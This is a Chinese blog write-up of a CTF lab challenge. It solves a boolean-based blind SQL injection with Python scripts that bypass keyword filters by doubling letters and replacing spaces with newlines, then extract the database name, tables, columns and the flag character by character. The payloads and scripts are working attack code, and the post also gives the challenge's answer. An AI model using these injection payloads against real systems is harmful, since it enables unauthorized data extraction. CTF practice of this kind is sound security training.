CTF实验吧认真一点 SQL盲注

最新推荐文章于 2024-05-11 22:44:48 发布
最新推荐文章于 2024-05-11 22:44:48 发布
阅读量216 收藏
点赞数
分类专栏: CTF实验吧
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/szgyunyun/article/details/98490796
版权

实验吧地址
http://ctf5.shiyanbar.com/web/earnest/index.php

很明显的返回两个不同得页面,判断为SQL盲注
并且 过滤了敏感字符
测试的时候还发现过滤了substr

尝试绕过,返回错误页面 说明 过滤是可以被绕过的

在这里插入图片描述
爆库名长度

import requests

str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(1,30):
    key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
    r = requests.post(url, data=key).text
    print(i)
    if str1 in r:
        print('the length of database is %s'%i)
        break

暴库、、

import requests

guess = '~abcdefghijklmnopqrstuvwxyz_0123456789'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
database = ''
for i in range(1,19):
    for j in guess:
        key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}
        r = requests.post(url, data=key).text
        print(key)
        if str1 in r:
            database += j
            print(j)
            break
print(database)

报表

import requests

guess = '~abcdefghijklmnopqrstuvwxyz_0123456789'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
tables = ''
for i in range(1,12):
    for j in guess:        
        flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i, j)    
        flag = flag.replace(' ', chr(0x0a))
        key = {'id':flag}       
        r = requests.post(url, data=key).text
        print(key)
        if str1 in r:
            tables += j
            print(j)
            break

print(tables)


import requests

guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
columns = ''
for i in range(1,6):
    for j in guess:        
        flag = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i, j)    
        flag = flag.replace(' ', chr(0x0a))
        key = {'id':flag}       
        r = requests.post(url, data=key).text
        print(key)
        if str1 in r:
            columns += j
            print(j)
            break

print(columns)

flag脚本

import requests

guess = '~abcdefghijklmnopqrstuvwxyz_0123456789{}!@#$%^&*()-=+*'
data = ''
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(1,20):
    for j in guess:        
        flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i, j)    
        flag = flag.replace(' ', chr(0x0a))
        key = {'id':flag}       
        r = requests.post(url, data=key).text
        print(key)
        if str1 in r:
            data += j
            print(j)
            break

print(data)

q
flag{haha~youwin!}
##很尴尬(把去掉才是便准答案正常应该是个空格没想到 空格这个字符)
在这里插入图片描述

god_mellon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF】关于SQL的细节
publicStr的博客
11-29 2602
目录: 0x01 CTF题目中关于load_file()、char()、hex()、unhex()、like、过滤空格、过滤引号及相关问题 0x02 某简单题目中关于order by利用排序布尔题目及源码 0x03 某CTF题解,+泄露+反序列化       0x01 CTF题目中关于load_file()、char()、hex()、unhex()、like、过滤空格、过滤引...
CTFSQL.py
11-25
CTF解题中有时会用到,这是一段SQL代码,运行于python37环境,多个字段信息提取的句子已释保存。
CTF中几种通用的sql手法和入的一些tips
xuchen16的博客
10-09 2557
转载自:https://www.anquanke.com/post/id/160584 0x00 前言 在ctf比赛中难免会遇到一些比较有(keng)趣(die)的入题,需要我们一步步的绕过waf和过滤规则,这种情况下大多数的入方法都是。然而在过程中由于这些过滤规则不太好绕过,这时候就会无从下手,下面分享一下自己在比赛中总结几种比较通用的手法和一些小tips,希望能在今后大家的...
2024年最新CTF Web SQL入专项整理(持续更新中)_ctf sql入,一文轻松搞定
最新发布
2401_84973202的博客
05-11 1313
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
ctfx从入门到放弃:SQL190510
爱党人士
05-11 414
Sql-Inject漏洞- 在有些情况下,后台使用了错误消息屏蔽方法(比如@)屏蔽了报错 此时无法在根据报错信息来进行入的判断。 这种情况下的入,称为“” 根据表现形式的不同,又分为based boolean和based time两种类型。 上面的知识要引申出来的一个逻辑是: 既然在情况下,从页面上只能判断1,0的情况,那么我们可以对databae()的结果 截取一个字符...
数据库
c353796317的专栏
11-22 268
Oracle 用用户区分不同项目使用的数据库。 Mysql   用数据库区分不同项目使用的数据库。
[CTF]基于布尔的SQL
V1040375575的博客
12-26 614
文章目录前言一、题目二、解题步骤1.bp抓包2、python脚本3、登陆后台得到flag 前言 [CTF学习]基于布尔的SQL 一、题目 提  示: 基于布尔的SQL 描  述: sql入 访问题目,又是一个web login登陆界面,根据提示可以大概猜测是一个sql post入题。 二、解题步骤 1.bp抓包 POST /index.php HTTP/1.1 Host: 114.67.246.176:10965 User-Agent: Mozilla/5.0 (Windows NT .
CTF中几种通用的sql手法和入的一些tips1
08-03
在网络安全竞赛,特别是Capture The Flag (CTF)中,SQL入是一种常见的攻击手段,用于测试和挑战参赛者的安全技能。本文将深入探讨几种通用的SQL手法,并提供一些实战中的技巧。 首先,我们来看一下XOR入。...
CTF用的各种脚本,各类古典加解密的脚本,RSA常用脚本,SQL脚本,编码加解密神器
12-29
在这个特定的压缩包文件中,包含了一系列用于CTF比赛的工具和脚本,主要涉及到古典加解密、RSA算法、SQL入攻击的技术以及编码和解密的实用工具。 首先,让我们详细讨论一下这些关键知识点: 1. **古典加解密...
[CTF]认真一点! rzyd.py
06-26
类型:web 网址:http://www.shiyanbar.com/ctf/2009 攻击:sql入 一句话总结:or 空格等特殊字符被过滤,使用oorr,()等代替 博文:https://blog.csdn.net/alex_bean/article/details/93757976
实验吧题目详情.xlsx
09-05
2019年9月5日抓取的实验吧的CTF训练营中一共234道题的详细信息。
ctf小经验sql
04-11
sql入一、找到入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
SQL入技巧-暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
ctf各种sql脚本
qq_51862722的博客
08-17 2844
以下的几个脚本都是自己写的(有参考别的大佬),代码可能不是最精简,但是还算顺眼 核心算法都是二分法,不推荐时间(速度硬伤) 脚本payload参考题目:[第一章 web入门]SQL入-2 / 极客大挑战finilysql(buuctf) 1.通过post传参的脚本 用的时候修改post参数和个数 1.1 基于异或,布尔等: import requests url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:
[CTF]SQL基于时间的(BUGKUCTF
V1040375575的博客
11-26 1219
这篇只是为了让我自己做个记录 在进行一个BUGKU的ctf:http://123.206.87.240:8002/web15/ 题目给出了源码: error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_...
ctfsql入——基于时间的
wlllllianqing的博客
09-18 799
基于时间的 原理:利用sleep()或benchmark()等函数让mysql执行时间变长,并结合判断条件if(expr1,expr2,expr3),然后通过页面的响应时间长短来判断语句返回的值是TRUE还是False,从而猜解一些未知的字段。 函数sleep(duration): 睡眠(暂停)时间为duration参数给定的秒数,然后返回0。若sleep()被中断,它会返回1。 select * from table where id=1 and sleep(3); select * from tab
CTFHUB SQL入——时间 附自己写的脚本
wuuconix's blog
08-28 2329
介绍 时间和上一篇布尔一样都是,都需要借助length,ascii,substr这些神奇的函数来猜测各项信息。它们的差别是猜测成功的依据。 布尔的话如果查询有结果,一般会有一个success_flag,比如在上一题里就会返回query successfully。我的脚本也就是request返回值里有没有这个文本来判断是否查询成功的。 但是时间不一样,它不光不给你查询的内容的回显,不给你报错信息,甚至连布尔里的success_flag也不给你。也就是什么情况呢?你在那里查询,它什么信息
php基于错误的,从一道CTF代码审计题看SQL
weixin_42299427的博客
04-14 541
文章难易度【★★★】文章阅读点/知识点: PHP代码审计、MySQLCTF技巧文章作者: 0h1in9e本文参与i春秋社区原创文章奖励计划,未经许可禁止转载0x01前言笔者在上个月参加一个CTF比赛的时候,遇到了一个PHP代码审计类的题目。具体地来说是关于一道SQL类的题目。做了这道题之后,对SQL有了更深入的了解,今天给大家分享下这道CTF题目以及解法,以及透过这个题目聊聊。0...
CTFHub-web(sql布尔)
分享与记录
07-22 4205
文章目录手工sqlmap入总结 手工入 1. 题目直接说明了是布尔,来简单验证一下 2. 既然如此,那么构造SQL语句,得到数据库长度 3. 数据库名称的长度为4,然后可以猜解出数据库的名称 得知当前数据库的第一个字母是s 然后依次得到数据库的第2个字母到第4个字母 最后对照ASCII表 得到当前数据库名称为sqli 4. 得到数据库中表的数量 前面只是演示如何得到数据库的名称 其实后面可以直接用database()来代替sqli 1 and (select count(t

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值